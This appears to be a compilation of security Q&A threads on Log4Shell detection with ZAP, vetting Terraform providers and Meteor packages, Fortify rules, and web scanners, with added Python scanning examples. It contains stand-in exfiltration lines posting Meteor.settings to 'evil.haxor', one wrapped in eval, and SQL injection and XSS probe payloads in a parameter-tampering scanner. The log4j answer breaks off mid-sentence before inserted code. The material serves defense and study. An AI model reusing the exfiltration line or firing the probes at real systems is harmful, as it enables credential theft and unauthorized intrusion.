I am trying to check the log4j vulnerability in GeoServer, both before and after updating the old log4j package to the new package which resolves the issue. For that, I am using the ZAP tool for checking the vulnerability, where I found the active scan rule (alpha). This rule attempts to discover the Log4Shell (CVE-2021-44228) vulnerability. Check out this link for more information: https://www.zaproxy.org/docs/desktop/addons/active-scan-rules-alpha/.
I am also a little confused about how to execute this active scan rule (alpha). Please share some information about its execution.
My question is whether this is the right way to check for this log4j vulnerability in GeoServer, or are there any other ways to do this?
You need to enable an OAST service (via Options / OAST) first.
You can either use one of the public ones we have pre-configured or stand up your own instance.
We also recommend that you scan headers as well, as this vulnerability is often exposed through them.
For more details see this blog post :) https://www.zaproxy.org/blog/2021-12-14-log4shell-detection-with-zap/
Using a lot of (official and non-official) Terraform providers, I'm looking for a tool to perform security analysis on Terraform providers before executing terraform plan/apply commands (and so executing provider code). I want to prevent malicious code from providers from being executed blindly.
I'm basically executing the terraform providers mirror command to save local copies of the required providers, and I'm wondering if I can security-scan that result.
I tested kics, checkov and tfsec, but they are all looking for security issues in my Terraform static code, not in the providers.
Do you have any good advice regarding this topic?
This is actually quite a good question. There are many other problems that can be reduced to the same generic question: how to make sure that the thing you downloaded from the internet does not do anything malicious to you, e.g.:
How to make sure that a Minecraft plugin does not hack you?
How to make sure that a Spring Boot dependency does not hack you?
How to make sure that a library xxx you attach to your project does not do harm to you?
Should you use Docker image yyy in your project?
Truth is: everything you use has the potential to explode right in your face (or, more correctly, right in the face of the system owner). That's why the system owner (usually a company) defines a set of rules to follow about what is allowed and what is not allowed. No set of rules you are aware of? Below is a set of rules we came up with ourselves when thinking about onboarding a new library for some projects to use:
Do not take random stuff from GitHub. Take only products with a longer history, a small bug backlog, few to no past issues in the CVE list, and active maintenance.
Do static code analysis yourself. Sometimes it is possible to have tools that work at the binary level do that for you; sometimes you can do it at the source level only. In the case of Java libraries, check what tools like Dependency-Track think about the library and version you are about to use.
Run the code and see how it works: what does it write, what does it read, which URLs does it communicate with (do a TCP dump if necessary).
Document everything you have done somewhere.
This does not give you 100% confidence that things will not go terribly wrong. But it is a systematic approach that will reduce the risk of doing something stupid.
As most IT folks know about this vulnerability, I have a question on the effect it would have on a system that uses libraries built on the affected log4j versions.
So let's say my app (APP_1) depends on dependency1.war. This dependency1.war is using, say, log4j version 2.8.x, which is affected by the vulnerability mentioned.
How would this affect the system APP_1 is deployed on, and the application itself (APP_1)?
What would be a recommended way to safeguard against attacks?
Much thanks in advance :)
It is very likely that your app is at some point logging a value that comes from a user, say a request parameter value. (This in itself is a bad programming practice, but very common.) If the user sends a request where this parameter is a specially crafted string then, because of this vulnerability, log4j would allow execution of another program on the host machine, for example
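The practical safeguard starts with finding every copy of log4j-core, including one buried inside a dependency WAR like the question's dependency1.war. The following is an added example, not code from the answer or from the log4j project: it walks an archive and every archive nested inside it, reads the log4j-core version from `pom.properties`, checks whether `JndiLookup.class` is still present (deleting it is the documented mitigation), and applies the CVE-2021-44228 affected range from the Apache advisory. The sample WAR is a constructed fixture with placeholder class bytes, not a real log4j build.

```python
import io
import re
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS_RE = re.compile(
    r"META-INF/maven/org\.apache\.logging\.log4j/log4j-core/pom\.properties$")
NESTED_RE = re.compile(r"\.(jar|war|ear|zip)$", re.I)


def parse_version(version):
    """'2.8.2' -> (2, 8, 2); '2.0-beta9' -> (2, 0, 0); unparseable -> None."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version or "")
    return tuple(int(x or 0) for x in m.groups()) if m else None


def is_affected_by_cve_2021_44228(version, jndi_lookup_present):
    """Affected per the Apache advisory: log4j-core 2.0-beta9 through 2.14.1,
    except the backport fixes 2.12.2+ and 2.3.1+. Without JndiLookup.class
    the lookup cannot run, so such an archive is reported as not affected."""
    if not jndi_lookup_present:
        return False
    v = parse_version(version)
    if v is None:
        return True            # class present, version unknown: assume the worst
    if v[0] != 2 or v >= (2, 15, 0):
        return False
    if v[1] == 12 and v[2] >= 2:
        return False
    if v[1] == 3 and v[2] >= 1:
        return False
    return True


def scan_archive(data, path, depth=0, max_depth=6):
    """Look for log4j-core inside an archive and inside any archive nested in
    it (WAR -> WEB-INF/lib/*.jar, EAR -> WAR -> jar ...). Returns a list of
    findings; nested locations are written as outer.war!/inner.jar."""
    findings = []
    if depth > max_depth:
        return findings
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings
    with zf:
        names = set(zf.namelist())
        version = None
        for name in names:
            if POM_PROPS_RE.search(name):
                props = zf.read(name).decode("utf-8", "replace")
                m = re.search(r"^version=(.*)$", props, re.M)
                version = m.group(1).strip() if m else None
        jndi = JNDI_CLASS in names
        if jndi or version is not None:
            findings.append({
                "path": path,
                "log4j_core_version": version,
                "jndi_lookup_present": jndi,
                "affected": is_affected_by_cve_2021_44228(version, jndi),
            })
        for name in sorted(names):
            if NESTED_RE.search(name):
                findings.extend(scan_archive(zf.read(name), path + "!/" + name,
                                             depth + 1, max_depth))
    return findings


def scan_file(filename):
    with open(filename, "rb") as f:
        return scan_archive(f.read(), filename)


def build_sample_war(log4j_version="2.8.2"):
    """Constructed fixture: a WAR bundling a fake log4j-core jar that carries
    JndiLookup.class and a pom.properties (placeholder bytes, not a real build)."""
    core = io.BytesIO()
    with zipfile.ZipFile(core, "w") as z:
        z.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
        z.writestr("META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties",
                   "artifactId=log4j-core\nversion=%s\n" % log4j_version)
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as z:
        z.writestr("WEB-INF/web.xml", "<web-app/>")
        z.writestr("WEB-INF/lib/log4j-core-%s.jar" % log4j_version, core.getvalue())
    return war.getvalue()


if __name__ == "__main__":
    for finding in scan_archive(build_sample_war(), "dependency1.war"):
        print(finding)
```

Run `scan_file` over every deployable on the host, not just APP_1's own build output: the WAR in the question carries its own log4j-core under `WEB-INF/lib`, so a clean APP_1 dependency tree says nothing about what dependency1.war loads at runtime. Upgrading that nested copy (or removing `JndiLookup.class` from it as a stopgap) is what actually closes the hole.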
I want to be able to protect my settings from 3rd parties.
Scenario:
I have sensitive data in my Meteor.settings file, especially in production, because that is the current best-practice place to put them.
I use a 3rd party Meteor package such as iron:router, but possibly one by a lesser-known author.
One of the 3rd party packages looks up my Meteor.settings and does an HTTP post on which some of my settings are sent along.
HTTP.post('http://evil.haxor', Meteor.settings) # all ur settings
Boom. Instantly I've leaked my production credentials, my payment gateway, Amazon, or whatever. Worse, as far as I know, the code that steals my settings might be loaded in and eval'd so I don't even see the string "Meteor.settings" in the source of the package.
I've tested, and the two things are allowed in 3rd party packages:
Meteor.settings.foo = "foobar" # why u change my settings?
eval("HTTP.post('evil.haxor', Meteor.settings)") # nooooo
I'm amenable to hacky solutions. I know the Meteor team might not address this right away, given all on their plates (Windows support, a non-Mongo DB). I just want to be able to provide this level of security to my company, for whom I think it would concern their auditors to discover this level of openness. Otherwise I fear I'm stuck manually security auditing every package I use.
Thank you for your consideration!
Edit: I see now that the risk of a package seeing/stealing the settings is essentially the same problem as any package reading (or writing) your filesystem. And the best way to address that would be to encrypt. That's a valid proposal, which I can use immediately. However, I think there could, and should, be a notion of 'package-scoped' settings. Also, the dialogue with commenters made me realize that the other issue, the issue of settings being (easily) modifiable at runtime, could be addressed by making the settings object read-only, using ES5 properties.
A malicious npm package can come with native code extensions, access the filesystem directly, and in general do anything the rest of the code in the app can do.
I see 2 (partial) solutions:
Set up a firewall with outbound rules and logging. Unfortunately, if your application communicates with any sort of social network (Facebook, Twitter) then the firewall idea will not handle malware that uses Twitter as a way to transmit data. But maybe it would help?
Lock down DNS resolution and provide a whitelist of DNS lookups. This way you could spot it if the app starts trying to communicate with 'evil.haxor'.
There are other more advanced detectors, but at some point a hacker is going to go after the other services running on the box and not try to modify your code.
Good luck. And it's good to be paranoid, because they really are out to get you.
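The DNS whitelist idea from that answer is cheap to operate because the resolver already logs every name the app asks for. Here is an added example (not from the answer, and not Meteor code) of the two halves: an audit that runs a resolver's query log against an allowlist with proper label-boundary matching, and a generated dnsmasq fragment that forwards only allow-listed names. The log line format is modelled on dnsmasq's `log-queries` output and the sample lines are constructed; the dnsmasq `#` wildcard in `address=` is an assumption to check against the manual for your version.

```python
import re
from collections import Counter

# dnsmasq-style query line (format constructed for this example):
#   Dec 14 10:22:01 dnsmasq[1234]: query[A] api.twitter.com from 10.0.0.5
QUERY_RE = re.compile(r"query\[(?P<qtype>[A-Z]+)\]\s+(?P<name>\S+)\s+from\s+(?P<src>\S+)")


def normalize(name):
    return name.lower().rstrip(".")


def is_allowed(name, allowlist):
    """Suffix match on label boundaries: 'twitter.com' allows 'api.twitter.com'
    but not 'evil-twitter.com' (a plain endswith check would pass that)."""
    name = normalize(name)
    for entry in allowlist:
        entry = normalize(entry)
        if name == entry or name.endswith("." + entry):
            return True
    return False


def audit_dns_log(lines, allowlist):
    """Count lookups of names outside the allowlist, keyed by (name, source ip).
    Reply/cache lines are ignored; only query lines name the asking host."""
    unexpected = Counter()
    for line in lines:
        m = QUERY_RE.search(line)
        if m and not is_allowed(m.group("name"), allowlist):
            unexpected[(normalize(m.group("name")), m.group("src"))] += 1
    return unexpected


def dnsmasq_allowlist_config(allowlist, upstream="1.1.1.1"):
    """dnsmasq fragment: forward allow-listed domains upstream, answer every
    other name with 0.0.0.0 via the '#' wildcard (assumed syntax), and keep
    query logging on so audit_dns_log has something to read."""
    lines = ["server=/%s/%s" % (normalize(d), upstream) for d in allowlist]
    lines.append("address=/#/0.0.0.0")
    lines.append("log-queries")
    return "\n".join(lines) + "\n"


SAMPLE_LOG = [  # constructed lines
    "Dec 14 10:22:01 dnsmasq[1234]: query[A] api.twitter.com from 10.0.0.5",
    "Dec 14 10:22:01 dnsmasq[1234]: query[AAAA] api.twitter.com from 10.0.0.5",
    "Dec 14 10:22:03 dnsmasq[1234]: query[A] evil.haxor from 10.0.0.5",
    "Dec 14 10:22:03 dnsmasq[1234]: reply evil.haxor is 0.0.0.0",
    "Dec 14 10:22:09 dnsmasq[1234]: query[A] evil.haxor from 10.0.0.5",
    "Dec 14 10:22:10 dnsmasq[1234]: query[A] evil-twitter.com from 10.0.0.5",
]
ALLOWLIST = ["twitter.com", "graph.facebook.com", "amazonaws.com"]

if __name__ == "__main__":
    for (name, src), n in audit_dns_log(SAMPLE_LOG, ALLOWLIST).most_common():
        print("%s looked up %s %d time(s)" % (src, name, n))
    print(dnsmasq_allowlist_config(ALLOWLIST))
```

As the answer notes, this does nothing against exfiltration over an allowed host such as api.twitter.com; it catches the lazy package that phones home to its own domain, which in practice is most of them.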
I want to see the specific rules of Fortify Secure Coding Rules (the rules that Fortify uses by default), because I want to write a report about all rules that are used by Fortify:
I have tried to see them in C:\Program Files\Fortify Software\HP Fortify v3.60\Core\config\rules but I have found .bin files and I can't see them.
I also have opened AuditWorkbench and in Security Content Management I can't see them either.
Is there any way to see them? Thanks for your help.
Short of becoming a Software Engineer at HP Fortify, no. The default rules are considered intellectual property of HP Fortify and no one outside Engineering has access to them.
What problem are you trying to solve by this report?
As HP/Fortify distributes rule-packs as binary files to protect their intellectual property, you will not be able to see how the individual rules are written.
However, if you're looking to include some information about which rules/rule-packs were used, you can navigate to the project summary screen and see which rule packs were used at the time of the scan. You will also have access to information such as each rule pack's version and additional metadata about each pack.
Being able to provide this level of detail in a meta-report might be sufficient to preempt follow-up questions. Just a thought...
The built-in Fortify rules are not available to read and edit, since they are the core intellectual property of the tool.
However, Fortify has published a taxonomy of what vulnerabilities are scanned for, and their mapping to CWEs. The link is here: https://vulncat.fortify.com/en/weakness
I am looking for a tool to scan a given URL for security vulnerabilities. I've googled around a bit and found a few but most of them require something that's publicly facing and my DEV environment isn't publicly facing, or they have some expensive solution that's more than I need for now. I don't need anything super powerful as I'm just doing lightweight testing for now, and the QA folk will run their more sophisticated battery of tests later.
EDIT: Use case for clarification
I hand the tool a URL to scan, ie: http://www.host.com/path/to/page.asp
It runs a series of tests on that page to see if there are any possible security vulnerabilities it exposes. Examples include but are not limited to SQL injection, cross-site scripting, etc.
Assuming that you wish to scan your web application by providing the 'base' URL of the application to a penetration testing tool, you will find the OWASP Live CD project to be useful. Grendel-Scan, available on the CD, might prove to be most useful, since it appears to be the most mature among the penetration testing tools in the list. Nikto and the OWASP Wapiti project are the other penetration testing tools on the Live CD.
Additionally, the Watcher plug-in for Fiddler is also capable of detecting certain vulnerabilities in the application, although it requires that the individual pages in the application be visited with Fiddler as the proxy.
There are two kinds of tools you will find for this. One kind has a list of known problems (a bug in IIS version 5.34 or whatever) and goes through the list trying each issue. Tools of this kind also try common filenames like robots.txt and web.config, etc. Nikto is an example of this type.
There is also the kind that will look at all the querystring/cookie/form parameters and tweak them to try to trigger faults. I believe this is what would serve you best, and for this I recommend Burp proxy. http://portswigger.net/proxy/ There is a free version and a pro version. Also in this set of tools are expensive things like IBM's AppScan and HP's WebInspect.
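To show what the second kind of tool does in miniature, here is an added example (not Burp, Nikto or any tool from the answer): it takes a URL like the asker's `http://www.host.com/path/to/page.asp?...`, replaces one query parameter at a time with a probe, and looks at the response for database error signatures (SQL injection) or for an unencoded reflection of a marker (cross-site scripting). The target is a constructed in-process stand-in for a classic ASP page so the example runs offline; for a real DEV host, replace `fake_app` with a `fetch(path, params)` function that performs the HTTP request and returns `(status, body)`.

```python
import html
import re
from urllib.parse import parse_qsl, urlsplit

# Probes expected to provoke a fault in an injectable parameter (constructed set).
SQLI_PROBES = ["'", "\"", "' OR '1'='1"]
SQL_ERROR_SIGS = [re.compile(p, re.I) for p in (
    r"you have an error in your sql syntax",      # MySQL
    r"unclosed quotation mark",                   # MSSQL / classic ASP
    r"ORA-\d{5}",                                 # Oracle
    r"SQLSTATE\[",                                # PDO
    r"unterminated quoted string",                # PostgreSQL
)]
# Only counts as reflected XSS if the raw '<s>' comes back un-encoded.
XSS_MARKER = "zq<s>zq"


def mutated_param_sets(url, probe):
    """Yield (param_name, params) with exactly one parameter replaced by the probe."""
    params = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    for i, (key, _value) in enumerate(params):
        mutated = list(params)
        mutated[i] = (key, probe)
        yield key, mutated


def scan_url(url, fetch):
    """fetch(path, params) -> (status, body). Returns a list of findings,
    one SQLi finding per parameter (first probe that fires) plus XSS findings."""
    path = urlsplit(url).path
    sqli_hits = {}
    for probe in SQLI_PROBES:
        for key, params in mutated_param_sets(url, probe):
            if key in sqli_hits:
                continue
            status, body = fetch(path, params)
            if any(sig.search(body) for sig in SQL_ERROR_SIGS):
                sqli_hits[key] = {"param": key, "type": "sqli",
                                  "probe": probe, "status": status}
    findings = list(sqli_hits.values())
    for key, params in mutated_param_sets(url, XSS_MARKER):
        status, body = fetch(path, params)
        if XSS_MARKER in body:
            findings.append({"param": key, "type": "xss",
                             "probe": XSS_MARKER, "status": status})
    return findings


def fake_app(path, params):
    """Constructed stand-in for a classic ASP page (not a real server):
    `id` goes unescaped into SQL, `q` is echoed raw, `page` is HTML-encoded."""
    p = dict(params)
    if path != "/path/to/page.asp":
        return 404, "<h1>Not found</h1>"
    ident = p.get("id", "")
    if "'" in ident or '"' in ident:
        return 500, ("Microsoft OLE DB Provider for ODBC Drivers error '80040e14'<br>"
                     "[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation "
                     "mark before the character string '%s'." % html.escape(ident))
    return 200, ("<html><body>Results for %s on page %s</body></html>"
                 % (p.get("q", ""), html.escape(p.get("page", "1"))))


if __name__ == "__main__":
    for finding in scan_url("http://www.host.com/path/to/page.asp?id=7&q=shoes&page=1", fake_app):
        print(finding)
```

The error-signature approach only sees verbose database errors, which is why real scanners add time-based and boolean-based probes for the blind cases; the marker approach likewise misses contexts where `<s>` is encoded but a quote would still break out of an attribute. It is enough to understand what the parameter-tampering tools are doing to your pages and why `q` and `id` light up while `page` does not.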
Are you talking about scanning the URI that someone has requested from your site?
If so, you can use the .htaccess file to simply redirect to a 404 page any URI that doesn't exist or isn't found in the database (depending on how you're building the site).
You can therefore force requests to come in a specific way and anything that doesn't will automatically get canned.